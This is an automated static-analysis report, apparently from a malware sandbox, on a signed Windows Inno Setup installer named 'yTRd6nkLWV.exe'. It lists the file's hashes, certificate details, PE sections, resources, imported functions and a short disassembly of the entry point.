                                                                                                                                                                                                                                                  SHA1:5447AA8C3C66601BD25F2C3A222B068EBAAE5BA9
                                                                                                                                                                                                                                                  SHA-256:35DDD1CE8C9AFE6DCBE0277C9BFB9E38B7A575B694DAC73AA66A8CE4A3F64E4A
                                                                                                                                                                                                                                                  SHA-512:E414BB7ECFA1BFA4CCA2663D330DA6A824BA9B255FE49E0F3993EE634265B7868C179D6AF86FE367C4E03F1312A510E345D75A9D25191091444B3BA325B323DB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...=bf..............................................................................................................................................................................................................................................................................................................................................r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):6.9594791382062615
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                                                                                                                  • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                                                                                                                  • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  File name:yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  File size:1'625'936 bytes
                                                                                                                                                                                                                                                  MD5:d71663e0a0164a482c1ffc9d2c06539f
                                                                                                                                                                                                                                                  SHA1:25030448b108c3b50fcba933dd7b472d3570dbf4
                                                                                                                                                                                                                                                  SHA256:276b08cdfcba38b36290db8a3162df343ba0f2bc3d3e48d22928ae61480b8183
                                                                                                                                                                                                                                                  SHA512:b34e7dee552a1698506ebb6475c1aade0be79a3d153203d9711c706dafa770336f2b7392cc3f6d71e8133bc7acd7bf062b5781a19cac41d6360bca10513987eb
                                                                                                                                                                                                                                                  SSDEEP:24576:WnbxPImgK4brDi4IxgRqzwqNb+Yz73P2EMZbG0JEtMOfPpqx9KWO1tYG54M5SeE:cNeKh4nqzF3PYdStMOfP8g15HEeE
                                                                                                                                                                                                                                                  TLSH:F8757C22A3E24833D4731F759D6B86846E357D202EA4968E7EF8DE4C0E35B40BD35396
                                                                                                                                                                                                                                                  File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                                                  Icon Hash:0e07030361cd6d38
                                                                                                                                                                                                                                                  Entrypoint:0x5025d8
                                                                                                                                                                                                                                                  Entrypoint Section:.itext
                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:f62b90e31eca404f228fcf7068b00f31
                                                                                                                                                                                                                                                  Signature Valid:true
                                                                                                                                                                                                                                                  Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                                                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                  Error Number:0
                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                  • 26/11/2024 13:07:48 26/11/2025 13:07:47
                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                  • CN=T H SUPPORT SERVICES LTD, O=T H SUPPORT SERVICES LTD, STREET=Suites 10s And 11s Trafford House Chester Road, PostalCode=M32 0RS, L=Stretford, S=Greater Manchester, C=GB, SERIALNUMBER=07890919, OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                  Thumbprint MD5:99CC43DD50C8C235E6703FBFE86B0302
                                                                                                                                                                                                                                                  Thumbprint SHA-1:21297766029D043DFBA740CD5203E45171FC8EAA
                                                                                                                                                                                                                                                  Thumbprint SHA-256:0A2CAAF3A1E6490DE521CCCA8452705AF0BD9A4A91D7F02CD8D3588404BCF77C
                                                                                                                                                                                                                                                  Serial:502F183B00B497DFC821D09DEB30526B
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  add esp, FFFFFFF0h
                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                  mov eax, 00500930h
                                                                                                                                                                                                                                                  call 00007F7B88D9AF16h
                                                                                                                                                                                                                                                  push FFFFFFECh
                                                                                                                                                                                                                                                  mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                  mov ebx, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                  call 00007F7B88D9BDC1h
                                                                                                                                                                                                                                                  and eax, FFFFFF7Fh
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  push FFFFFFECh
                                                                                                                                                                                                                                                  mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                  call 00007F7B88D9C016h
                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  push 00502653h
                                                                                                                                                                                                                                                  push dword ptr fs:[eax]
                                                                                                                                                                                                                                                  mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                                  call 00007F7B88D9B761h
                                                                                                                                                                                                                                                  call 00007F7B88E925FCh
                                                                                                                                                                                                                                                  mov eax, dword ptr [00500568h]
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  push 005005CCh
                                                                                                                                                                                                                                                  mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                  call 00007F7B88E0E3EDh
                                                                                                                                                                                                                                                  call 00007F7B88E92650h
                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                  pop edx
                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                  mov dword ptr fs:[eax], edx
                                                                                                                                                                                                                                                  jmp 00007F7B88E945CBh
                                                                                                                                                                                                                                                  jmp 00007F7B88D9663Dh
                                                                                                                                                                                                                                                  call 00007F7B88E923CCh
                                                                                                                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                                                                                                                  call 00007F7B88D970FEh
                                                                                                                                                                                                                                                  call 00007F7B88D96A81h
                                                                                                                                                                                                                                                  mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                  mov edx, 005027E8h
                                                                                                                                                                                                                                                  call 00007F7B88E0DEF8h
                                                                                                                                                                                                                                                  push 00000005h
                                                                                                                                                                                                                                                  mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                  mov eax, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  call 00007F7B88D9BFD7h
                                                                                                                                                                                                                                                  mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                  mov edx, dword ptr [004DACA0h]
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x10e0000x3840.idata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1140000x81e00.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x18a6000x2950.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1130000x18.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10ea800x88c.idata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  .text0x10000xffdc80xffe00680bf2b0bd4a28b3d7352f45ff6c3fcdFalse0.4816328010503175data6.4785274378109845IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .itext0x1010000x17f40x18008e0d52126a75001416d71c23878be2c1False0.5244140625data6.003729381717893IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .data0x1030000x308c0x3200c2acc8e96fc244753abd1d87bb624bc0False0.425078125data4.3575606000501415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .bss0x1070000x61980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .idata0x10e0000x38400x3a000e1e8128f777a5ff18a144305a4fb39cFalse0.3108836206896552data5.2048781278956655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .tls0x1120000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rdata0x1130000x180x2009cf98ea6bb17a35d99fa770a2e9a8ff0False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .rsrc0x1140000x81e000x81e00bf317f12b51dcfd180a4b039a5f110faFalse0.6202233968960539data7.394129607186501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_CURSOR0x114d640x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                  RT_CURSOR0x114e980x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                                                  RT_CURSOR0x114fcc0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                  RT_CURSOR0x1151000x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                                                  RT_CURSOR0x1152340x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                                                  RT_CURSOR0x1153680x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                                                  RT_CURSOR0x11549c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                  RT_BITMAP0x1155d00x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                                                                                                                                                                  RT_BITMAP0x115ab80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                                                                                                                                                                  RT_ICON0x115ba00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.527027027027027
                                                                                                                                                                                                                                                  RT_ICON0x115cc80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.5
                                                                                                                                                                                                                                                  RT_ICON0x115fb00x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.4115853658536585
                                                                                                                                                                                                                                                  RT_ICON0x1166180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4277456647398844
                                                                                                                                                                                                                                                  RT_ICON0x116b800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.601985559566787
                                                                                                                                                                                                                                                  RT_ICON0x1174280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.5378464818763327
                                                                                                                                                                                                                                                  RT_ICON0x1182d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6914893617021277
                                                                                                                                                                                                                                                  RT_ICON0x1187380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5311913696060038
                                                                                                                                                                                                                                                  RT_ICON0x1197e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.46846473029045643
                                                                                                                                                                                                                                                  RT_ICON0x11bd880xc66cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9978935349240098
                                                                                                                                                                                                                                                  RT_STRING0x1283f40xecdata0.6059322033898306
                                                                                                                                                                                                                                                  RT_STRING0x1284e00x250data0.47466216216216217
                                                                                                                                                                                                                                                  RT_STRING0x1287300x28cdata0.4647239263803681
                                                                                                                                                                                                                                                  RT_STRING0x1289bc0x3e4data0.4347389558232932
                                                                                                                                                                                                                                                  RT_STRING0x128da00x9cdata0.717948717948718
                                                                                                                                                                                                                                                  RT_STRING0x128e3c0xe8data0.6293103448275862
                                                                                                                                                                                                                                                  RT_STRING0x128f240x468data0.3820921985815603
                                                                                                                                                                                                                                                  RT_STRING0x12938c0x38cdata0.3898678414096916
                                                                                                                                                                                                                                                  RT_STRING0x1297180x3dcdata0.39271255060728744
                                                                                                                                                                                                                                                  RT_STRING0x129af40x360data0.37037037037037035
                                                                                                                                                                                                                                                  RT_STRING0x129e540x40cdata0.3783783783783784
                                                                                                                                                                                                                                                  RT_STRING0x12a2600x108data0.5113636363636364
                                                                                                                                                                                                                                                  RT_STRING0x12a3680xccdata0.6029411764705882
                                                                                                                                                                                                                                                  RT_STRING0x12a4340x234data0.5070921985815603
                                                                                                                                                                                                                                                  RT_STRING0x12a6680x3c8data0.3181818181818182
                                                                                                                                                                                                                                                  RT_STRING0x12aa300x32cdata0.43349753694581283
                                                                                                                                                                                                                                                  RT_STRING0x12ad5c0x2a0data0.41964285714285715
                                                                                                                                                                                                                                                  RT_RCDATA0x12affc0x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                                                                                                                                  RT_RCDATA0x1332e40x10data1.5
                                                                                                                                                                                                                                                  RT_RCDATA0x1332f40x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                                                                                                  RT_RCDATA0x134af40x6bcdata0.6467517401392111
                                                                                                                                                                                                                                                  RT_RCDATA0x1351b00x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                                                                                                                                                                  RT_RCDATA0x13acc00x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                                                                                                                                                                  RT_RCDATA0x13ade80x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                                                                                                                                                                  RT_RCDATA0x13b18c0x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                                                                                                                                                                  RT_RCDATA0x13b4ac0x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                                                                                                                                                                  RT_RCDATA0x13b7ac0x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                                                                                                                                                                  RT_RCDATA0x13bd880x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                                                                                                                                  RT_RCDATA0x13c1ec0x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2a80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2bc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x13e2f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                  RT_GROUP_ICON0x13e30c0x92dataEnglishUnited States0.636986301369863
                                                                                                                                                                                                                                                  RT_VERSION0x13e3a00x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                                                                                                                                  RT_MANIFEST0x13e4fc0x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                                                  advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                                                                                                                  user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                                                                                                                                  kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                                                                                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                                                                                                                                                                  user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                                                  msimg32.dllAlphaBlend
                                                                                                                                                                                                                                                  gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                                                                                                                                                                  version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                                                                                                                                  mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                                                                                                                                                  kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                                                                                                                                                                  advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                                                                                                                                                                  comctl32.dllInitCommonControls
                                                                                                                                                                                                                                                  kernel32.dllSleep
                                                                                                                                                                                                                                                  oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                                                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                                                                                                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                                                  comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                                                  shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                                                                                                                                                                  shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                                                                                                                                                                  comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                  ole32.dllCoDisconnectObject
                                                                                                                                                                                                                                                  advapi32.dllAdjustTokenPrivileges
                                                                                                                                                                                                                                                  oleaut32.dllSysFreeString
